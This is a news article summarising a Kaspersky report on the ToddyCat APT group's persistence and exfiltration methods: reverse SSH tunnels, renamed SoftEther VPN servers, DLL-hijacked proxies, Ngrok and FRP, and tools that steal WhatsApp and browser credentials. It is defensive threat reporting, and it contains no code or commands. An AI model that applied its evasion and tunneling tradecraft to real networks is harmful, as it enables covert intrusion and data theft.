CyberClub

ToddyCat, a Chinese advanced persistent threat (APT) group that has been targeting Asian and European government and military organizations over the past four years, is using several different traffic tunneling tools to ensure persistent access to compromised networks, according to researchers at Kaspersky Lab.

The group’s primary goal is the exfiltration of large volumes of sensitive information, which can take a long time and is prone to detection, researchers from the security firm said in a new report.

“Having several tunnels to the infected infrastructure implemented with different tools allows attackers to maintain access to systems even if one of the tunnels is discovered and eliminated,” the researchers said. “By securing constant access to the infrastructure, attackers are able to perform reconnaissance and connect to remote hosts.”

ToddyCat is known to use DLL hijacking techniques to deploy its malware. This involves delivering the payload with a specific DLL name together with a legitimate executable that looks for that specific DLL in its working directory when executed. Having malicious code indirectly loaded into memory by a legitimate application is much stealthier than executing malware binaries directly.

The group is also known to use custom malware loaders that are tailored for every victim. However, when it comes to tunneling, the group seems to rely on many third-party tools.

ToddyCat uses reverse SSH tunnels

The ToddyCat attackers will often set up a reverse SSH tunnel, meaning an SSH connection from the compromised system back to their command-and-control server, instead of setting up an SSH server on the system and then remotely connecting to it. The benefit of a reverse tunnel is that most firewalls and network monitoring tools will not find an outgoing SSH connection suspicious, but an incoming one might be blocked or filtered.

To set up these tunnels, the attackers simply use the SSH client from the OpenSSH toolkit for Windows together with the openssh library required to run it and a private key file that allows the endpoint to authenticate to the server.

The OpenSSH client is dropped in the regular C:Program FilesOpenSSH location since its presence on a system would not necessarily be suspicious. However, the private key file received an .ini or .dat extension to hide its true purpose and was placed in the C:WindowsAppReadiness folder. This folder is used by the Windows AppReadiness service to store application files for initial Windows or user configuration.

Furthermore, the attackers execute a script called a.bat which changes the directory ownership of this folder to make it only accessible to the SYSTEM user and inaccessible to regular users and Administrators.

The SSH tunnel will be started by a scheduled task and will be used to tunnel traffic from the attackers’ server to a local service. For example, a connection from user systemtest01 will tunnel traffic from port 31481 on the server to local port 53 (DNS) while a connection from user systemtest05 will redirect traffic from the malicious server to port 445, normally used by the SMB service. This will allow the attackers to interact with those local services remotely over the SSH tunnel.

For example, if the local system is a domain controller, it will likely run a DNS server on port 53 which can be queried to discover internal network hostnames. On the other hand, SMB is used for file sharing and could give access to local file shares on the server.

VPN connections have been set up on compromised servers

The ToddyCat attackers were also observed setting up virtual private network (VPN) servers on compromised systems by using the open-source SoftEther VPN software in order to be able to remotely connect to those systems. SoftEther supports multiple VPN protocols including L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.

The attackers will use a remote SMB share to deploy a copy of the SoftEther vpnserver_x64.exe executable on compromised systems but rename it to other common applications, including security programs. They will also deploy a file called hamcore.se2 that is required by SoftEther to run in the same folder, as well as the vpn_server.config configuration file.

Reverse proxy tools deployed to encrypt data

The attackers were also seen deploying a proxy tool called Krong through DLL hijacking via the legitimate AVG TuneUp software. Krong encrypts the data transmitted through it using the XOR function and the attackers use it in combination with another open-source reverse proxy for HTTP, TLS or TCP-based applications called Ngrok.

The attackers used Ngrok to pass traffic from their remote command-and-control server to the endpoint systems and Ngrok then passed that traffic to Krong for further encryption.

In addition to these tools, the researchers also saw the ToddyCat attackers deploy a reverse proxy written in Go and called FRP (fast reverse proxy). This tool is designed to enable access to a local server behind a NAT or firewall and is suited for accessing resources on private networks without the need for things like port forwarding in the router.

Multiple data collection tools used by ToddyCat

To automate data collection from compromised systems and networks the group uses a combination of programs, according the Kaspersky’s analysis. One is a custom tool written in .NET that can search for certain words inside file names or for files with certain extensions or last modified dates and then add the found files to a ZIP archive. The researchers have dubbed this tool “cuthead”.

Another tool also written in .NET and dubbed WAExp is designed to steal the chat history and other user data from the web app version of the popular WhatsApp messaging platform.

“For users of the WhatsApp web app, their browser local storage contains their profile details, chat data, the phone numbers of users they chat with and current session data,” the researchers said. “Attackers can gain access to this data by copying the browser’s local storage files.”

A third custom tool dubbed TomBerBil is used to decrypt the local browser storage from Chrome and Microsoft Edge and steal all authentication cookies and stored passwords which would potentially enable them to gain access to the online accounts of the targeted users.

“In several cases, beside using TomBerBil, the adversary created a shadow copy of the disk and archived the User Data file with 7zip for the further exfiltration,” the researchers said. The Kaspersky report contains a list of indicators of compromise such as file hashes, IP addresses used by ToddyCat’s command-and-control servers and URLs used to host the various tools that are deployed on compromised systems.